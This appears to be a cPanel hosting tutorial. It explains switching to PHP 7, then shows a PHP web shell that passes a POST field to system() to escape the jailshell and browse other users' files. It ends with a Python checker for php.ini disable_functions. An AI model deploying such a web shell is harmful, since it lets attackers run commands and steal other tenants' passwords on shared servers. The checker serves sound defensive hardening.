
cPanel

How to use PHP 7 in cPanel hosting


cPanel ships with PHP 7, but PHP 5 is still used by default. Even if you don’t use PHP 7-specific functions, the performance benefit that PHP 7 brings is a good enough reason to switch. This is particularly important on shared hosting such as cPanel, where performance is especially lacking.

Make sure your application is compatible with PHP 7 before making the switch.

To start using PHP 7 within your cPanel hosting, log in to cPanel and follow these steps:

  1. Go to the Software section and click on Select PHP Version.
  2. Here you’ll see the PHP version used for your cPanel hosting. Click on the select box, and choose 7.0 or whatever latest version of PHP is available.
  3. Click Set as current for the changes to take effect, and notice that Current PHP version in the example is now 7.0.
  4. Check your current PHP version to confirm.

How to bypass cPanel Jailshell using PHP


Users registering for shared Linux web hosting accounts are normally not provided with shell access. Even if they are, what they can do with the shell is limited, as they are confined to a jailed environment, thanks to cPanel’s jailshell. Displaying the SHELL variable at the command prompt verifies this:

$ echo $SHELL
/usr/local/cpanel/bin/jailshell

To briefly show what this means, listing the home directories with the following Linux command reveals that the user is alone in the shell.

$ ls /home/ | wc -l
1

With some simple HTML and PHP, a web-based shell can offer something more to the users. The following code can be made available through http://www.anyserver.com/jailshell.php:

<html>
  <body>
    <p>Enter command:
      <form action="jailshell.php" method=post>
      <input type=text name=command>
      <input type=submit name=submit>
      </form>
    </p>
    <pre>
      <?php system ($_POST['command']); ?>
    </pre>
  </body>
</html>

Executing some simple commands, such as the following, shows what it’s capable of.

People with malicious intent can use this method to search other users’ home directories and grep through their web applications’ configuration files to steal passwords and other juicy information.

Most hosting providers already disable system() and other similar functions in their PHP configuration.
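To check that mitigation on a server you administer, the following added example (not part of the original post) reads the text of a php.ini and lists the command-execution functions that its disable_functions directive leaves callable. The function list beyond system(), the sample php.ini fragments and the rule that the last assignment is the effective one are assumptions of this example.

```python
import re

# PHP functions that start an external process. The page names system();
# the other six are this example's reading of "other similar functions".
COMMAND_FUNCTIONS = ("system", "exec", "shell_exec", "passthru",
                     "popen", "proc_open", "pcntl_exec")
DIRECTIVE = re.compile(r"^\s*disable_functions\s*=(.*)$")

def disabled_functions(ini_text):
    """Return the names listed in the effective disable_functions directive."""
    value = ""
    for line in ini_text.splitlines():
        match = DIRECTIVE.match(line)   # commented-out lines start with ';'
        if match:
            # Take the last assignment as the effective one and drop any
            # trailing ';' comment.
            value = match.group(1).split(";", 1)[0]
    names = value.strip().strip("\"'").split(",")
    # Names are compared exactly as written, so a misspelt or oddly cased
    # entry is reported as not covering the function.
    return {name.strip() for name in names if name.strip()}

def still_enabled(ini_text):
    """List the command-execution functions the configuration leaves callable."""
    disabled = disabled_functions(ini_text)
    return [name for name in COMMAND_FUNCTIONS if name not in disabled]

# Constructed php.ini fragments, not taken from any real server.
DEFAULT_INI = "; constructed sample\nmemory_limit = 128M\ndisable_functions =\n"
PARTIAL_INI = "disable_functions = system   ; only the function in the web shell\n"
HARDENED_INI = ('disable_functions = "system, exec, shell_exec, passthru, '
                'popen, proc_open, pcntl_exec"\n')
# A later, empty assignment silently undoes an earlier list.
OVERRIDDEN_INI = HARDENED_INI + ";disable_functions = phpinfo\ndisable_functions =\n"

if __name__ == "__main__":
    for label, text in [("default", DEFAULT_INI), ("partial", PARTIAL_INI),
                        ("hardened", HARDENED_INI), ("overridden", OVERRIDDEN_INI)]:
        print(f"{label:10} still callable: {still_enabled(text) or 'none'}")
```

Each PHP version installed on a server reads its own php.ini, so run the check against every one of them.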
